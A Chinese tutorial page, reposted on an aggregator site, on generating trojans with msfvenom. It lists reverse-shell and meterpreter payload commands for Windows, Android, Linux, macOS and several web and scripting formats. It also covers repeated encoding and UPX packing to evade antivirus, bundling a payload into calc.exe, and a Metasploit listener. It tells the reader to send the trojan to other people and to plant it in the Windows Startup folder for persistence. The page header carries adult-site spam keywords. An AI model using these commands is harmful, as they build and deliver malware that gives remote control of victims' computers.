日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

msfvenom生成muma

發布時間:2023/12/16 编程问答 25 豆豆
生活随笔 收集整理的這篇文章主要介紹了 msfvenom生成muma 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

簡介

msfvenom是msfpayload,msfencode的結合體,可利用msfvenom生成木馬程序,并在目標機上執行,在本地監聽上線。

參數

–p (- -payload-options):添加載荷payload。載荷這個東西比較多,這個軟件就是根據對應的載荷payload生成對應平臺下的后門,所以只有選對payload,再填寫正確自己的IP,PORT,就可以生成對應語言,對應平臺的后門。

· –l:查看所有payload encoder nops。

· –f :輸出文件格式。

· –e:編碼免殺。

· –a:選擇架構平臺? x86 | x64 | x86_64

· –o:文件輸出

· –s:生成payload的最大長度,就是文件大小。

· –b:避免使用的字符 例如:不使用 ‘\0f’。

· –i:編碼次數。

· –c:添加自己的shellcode

· –x | -k:捆綁

生成exe木馬

#lhost是我們的主機ip,lport是我們主機的用于監聽的端口

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.129 lport=8888 -f exe -o test.exe?

#編碼3次

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.129 lport=8888 -i 3 -e x86/shikata_ga_nai? -f exe -o test.exe?

#編碼10次、捆綁正常的32位calc.exe,生成32位的test.exe文件

msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp -e x86/shikata_ga_nai -i 10 lhost=192.168.31.129 lport=8888 -x calc.exe -f exe -o test.exe

?

利用 upx 加殼

upx的功能有兩種描述。一種叫做給程序加殼,另一種叫壓縮程序。其實這兩種表述都是正確的,只是從不同的角度對upx的描述。upx的工作原理其實是這樣的:首先將程序壓縮。所謂的壓縮包括兩方面,一方面在程序的開頭或者其他合適的地方插入一段代碼,另一方面是將程序的其他地方做壓縮。壓縮也可以叫做加密,因為壓縮后的程序比較難看懂,主要是和原來的代碼有很大的不同。最大的表現也就是他的主要作用就是程序本身變小了。變小之后的程序在傳輸方面有很大的優勢。其次就是在程序執行時,實時的對程序解壓縮。解壓縮功能是在第一步時插入的代碼完成的功能。聯起來 就是:upx可以完成代碼的壓縮和實時解壓執行。且不會影響程序的執行效率。upx和普通的壓縮,解壓不同點就算在于upx是實時解壓縮的。

upx -9 test.exe -k -o test1.exe

生成其他格式木馬:

安卓app:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.31.129 LPORT=8888 -o ~/Desktop/test2.apk

Linux:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.31.129 LPORT=8888 -f? elf > shell.elf

Mac:

msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.31.129 LPORT=8888 -f macho >? shell.macho

PHP:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.20.27 LPORT=4444 -f raw -o test.php

ASP:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.129 LPORT=8888? -f asp > shell.asp

ASPX:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.129 LPORT=8888? -f? aspx > shell.aspx

JSP:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.31.129 LPORT=8888 -f? raw > shell.jsp

Bash:

msfvenom -p cmd/unix/reverse_bash LHOST=192.168.31.129 LPORT=8888 -f?? raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=192.168.31.129 LPORT=8888 -f raw > shell.pl

Python

msfvenom -p python/meterpreter/reverser_tcp LHOST=192.168.31.129 LPORT=8888 -f?? raw > shell.py

#使用exploit/multi/handler監聽從肉雞發來的數據

msf > use exploit/multi/handler?

#設置payload,不同的木馬設置不同的payload

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp?

#主機ip

msf exploit(handler) > set lhost 192.168.31.129?

#主機端口

msf exploit(handler) > set lport 8888???????????

msf exploit(handler) > exploit

然后利用任何一種方式發送給其他人,讓其在其他主機上運行,這邊就會接收到反彈過來的session。

輸入:sessions? -l? 可以查看到得到的shell,使用 sessions -i? 1 可以進入指定的shell

對于這個木馬,如果在獲取到某主機的shell后,想要在目標主機建立持續性的后門,可以將該木馬放到目標主機的開機啟動項中,只要該主機啟動后,就可以連接到該主機了。

C:\Users\$username$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

總結

以上是生活随笔為你收集整理的msfvenom生成muma的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。